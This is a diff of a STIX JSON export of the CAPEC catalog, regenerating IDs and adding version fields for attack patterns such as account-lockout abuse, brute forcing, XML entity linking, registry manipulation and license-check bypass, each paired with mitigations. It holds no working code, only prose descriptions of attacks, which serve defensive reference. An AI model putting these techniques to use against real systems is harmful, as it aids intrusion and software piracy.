"marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6ee5688f-d26f-40bf-a9b9-618fe5d76335", - "source_ref": "course-of-action--29cc8977-ef47-4c16-a4d2-92483b2e34ec", + "id": "relationship--ce46e0f7-73b1-4efc-88f4-9df919fc2aac", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { "name": "Inducing Account Lockout", "description": "An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -10585,65 +10691,66 @@ "A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b98099e1-1a4b-4d43-9e04-633fac2a9511" + "id": "attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-2-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.", "type": "course-of-action", - "id": "course-of-action--184836ae-02a5-47ca-8160-01f35be6c429" + "id": "course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b75ca695-e25e-48b6-b7a3-3f301dfc6f52", - "source_ref": "course-of-action--184836ae-02a5-47ca-8160-01f35be6c429", + "id": "relationship--d42da37c-5f9f-4437-ba40-8053ede73471", + "source_ref": "course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b98099e1-1a4b-4d43-9e04-633fac2a9511" + "target_ref": "attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-2-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "When implementing security features, consider how they can be misused and made to turn on themselves.", "type": "course-of-action", - "id": "course-of-action--b17ac360-6462-4557-9697-3a3f33d0aba1" + "id": "course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--70410933-c2ac-41f5-b747-f30d3176fda5", - "source_ref": "course-of-action--b17ac360-6462-4557-9697-3a3f33d0aba1", + "id": "relationship--324d5558-538a-42e4-8dc7-00f3f0b83837", + "source_ref": "course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b98099e1-1a4b-4d43-9e04-633fac2a9511" + "target_ref": "attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a" }, { "name": "Encryption Brute Forcing", "description": "An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -10696,65 +10803,66 @@ "In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b9e53ae1-97b3-4131-821f-21dcecaaacbe" + "id": "attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-20-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", "type": "course-of-action", - "id": "course-of-action--461e56f5-2cf0-4637-b074-158b287a6dbd" + "id": "course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--57cb4db0-53ee-4540-83cf-735cd9f86db1", - "source_ref": "course-of-action--461e56f5-2cf0-4637-b074-158b287a6dbd", + "id": "relationship--6b514f14-d7fe-459e-8bcc-c624e6d1d2f2", + "source_ref": "course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b9e53ae1-97b3-4131-821f-21dcecaaacbe" + "target_ref": "attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-20-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.", "type": "course-of-action", - "id": "course-of-action--5a8015dd-1f0a-4c4b-ba21-50a28ede8518" + "id": "course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f88ffa7f-7fac-428a-819a-ecbd2f492c46", - "source_ref": "course-of-action--5a8015dd-1f0a-4c4b-ba21-50a28ede8518", + "id": "relationship--0b6e7860-8271-4d61-bad2-42adc4251dd4", + "source_ref": "course-of-action--c0ef85bc-d93c-403f-a208-50e1a983826d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b9e53ae1-97b3-4131-821f-21dcecaaacbe" + "target_ref": "attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf" }, { "name": "Removal of filters: Input filters, output filters, data masking", "description": "An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content. For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information. For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records. This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -10774,15 +10882,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e0e3649a-ce09-4ad8-a12a-f8fc87ba661e" + "id": "attack-pattern--83311639-e698-4193-bb1f-b5b90c730078" }, { "name": "XML Entity Linking", "description": "An attacker creates an XML document that contains an external entity reference. External entity references can take the form of tags in a DTD. Because processors may not validate documents with external entities, there may be no checks on the nature of the reference in the external entity. This can allow an attacker to open arbitrary files or connections.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -10826,40 +10935,41 @@ "\n The following DTD would attempt to open the /dev/tty device:\n ]>\n A malicious actor could use this crafted DTD to reveal sensitive information.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9220fcd3-46d0-4772-b77f-0d5f365a2da6" + "id": "attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-201-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configure the XML processor to only retrieve external entities from trusted sources.", "type": "course-of-action", - "id": "course-of-action--b0ca5d75-5c84-4dca-9892-33335c71d65e" + "id": "course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2132d350-9fc7-4082-b453-04ebf913ccc3", - "source_ref": "course-of-action--b0ca5d75-5c84-4dca-9892-33335c71d65e", + "id": "relationship--df34685d-a932-4704-9995-216ff7affeab", + "source_ref": "course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9220fcd3-46d0-4772-b77f-0d5f365a2da6" + "target_ref": "attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e" }, { "name": "Create Malicious Client", "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures. For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality. For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -10884,18 +10994,19 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e49f49b6-ac1f-4b2d-9eab-83b4259a2c18" + "id": "attack-pattern--d07d20eb-71c3-4416-bbaf-4a63c55230d8" }, { "name": "Manipulate Registry Information", "description": "An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -10924,90 +11035,91 @@ "Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it)." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--3584ce22-e482-43bd-ba07-6fb8fe882857" + "id": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-203-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", "type": "course-of-action", - "id": "course-of-action--e01a4584-7b35-4fbe-abf4-672d2abf645f" + "id": "course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--91483bd2-a2e8-476a-81e1-19608025a74a", - "source_ref": "course-of-action--e01a4584-7b35-4fbe-abf4-672d2abf645f", + "id": "relationship--c10a2663-afd1-4155-837d-0204962bc33b", + "source_ref": "course-of-action--912509db-7d6a-4695-9793-2a80b06ec40c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3584ce22-e482-43bd-ba07-6fb8fe882857" + "target_ref": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-203-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.", "type": "course-of-action", - "id": "course-of-action--09cebeef-1e55-445a-94b7-3029f30c7e80" + "id": "course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9987ed20-cf79-4993-8b4f-7f1f4415226f", - "source_ref": "course-of-action--09cebeef-1e55-445a-94b7-3029f30c7e80", + "id": "relationship--9f18e491-5633-4ed9-ac64-4c31bef0b762", + "source_ref": "course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3584ce22-e482-43bd-ba07-6fb8fe882857" + "target_ref": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-203-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Employ robust identification and audit/blocking via whitelisting of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", "type": "course-of-action", - "id": "course-of-action--b6dd58ac-a09f-41c6-9db8-bc034b7c6203" + "id": "course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6dd02877-1533-4738-adb4-51ba5a01384d", - "source_ref": "course-of-action--b6dd58ac-a09f-41c6-9db8-bc034b7c6203", + "id": "relationship--691c73d9-4383-47a1-8fed-889f5882e593", + "source_ref": "course-of-action--b64d4932-b08f-49e3-8247-ed3de4c889ab", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3584ce22-e482-43bd-ba07-6fb8fe882857" + "target_ref": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a" }, { "name": "Lifting Sensitive Data Embedded in Cache", "description": "An attacker examines a target application's cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", @@ -11038,15 +11150,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--46994dd6-a74d-4a14-88a8-47c8df6a35b2" + "id": "attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f" }, { "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -11059,15 +11172,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--25870180-9eb0-4b36-aeb4-9e9f3983756e" + "id": "attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7" }, { "name": "Signing Malicious Code", "description": "The attacker extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer's key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the attacker has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the attacker to execute arbitrary code on the victim's computer.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -11092,15 +11206,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--463c5375-8441-4a55-9c08-2041bb3b3bcc" + "id": "attack-pattern--844d974b-a593-44ec-87b3-9519bdbcca79" }, { "name": "Removing Important Client Functionality", "description": "An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Attackers can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -11178,90 +11293,91 @@ "Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--73c0671d-58fc-4349-a28d-e3d9e74c160e" + "id": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-207-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.", "type": "course-of-action", - "id": "course-of-action--5100853b-58e5-44c3-86c3-1110ff201287" + "id": "course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c60dcd26-bdd0-4e05-99c7-344b059b8597", - "source_ref": "course-of-action--5100853b-58e5-44c3-86c3-1110ff201287", + "id": "relationship--120f0fd7-afbd-4c09-ba25-768d2f06b935", + "source_ref": "course-of-action--ee91e2c3-5d44-4c44-af50-fc59eb844e31", "relationship_type": "mitigates", - "target_ref": "attack-pattern--73c0671d-58fc-4349-a28d-e3d9e74c160e" + "target_ref": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-207-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Ship client-side application with integrity checks (code signing) when possible.", "type": "course-of-action", - "id": "course-of-action--9a2b466e-b082-48ce-9ea9-ac34841c73c9" + "id": "course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5b93a428-afb6-4c0e-bfba-162743ac9a46", - "source_ref": "course-of-action--9a2b466e-b082-48ce-9ea9-ac34841c73c9", + "id": "relationship--04a64c41-d891-4ea3-bcf1-ccf7548bf5fb", + "source_ref": "course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db", "relationship_type": "mitigates", - "target_ref": "attack-pattern--73c0671d-58fc-4349-a28d-e3d9e74c160e" + "target_ref": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + 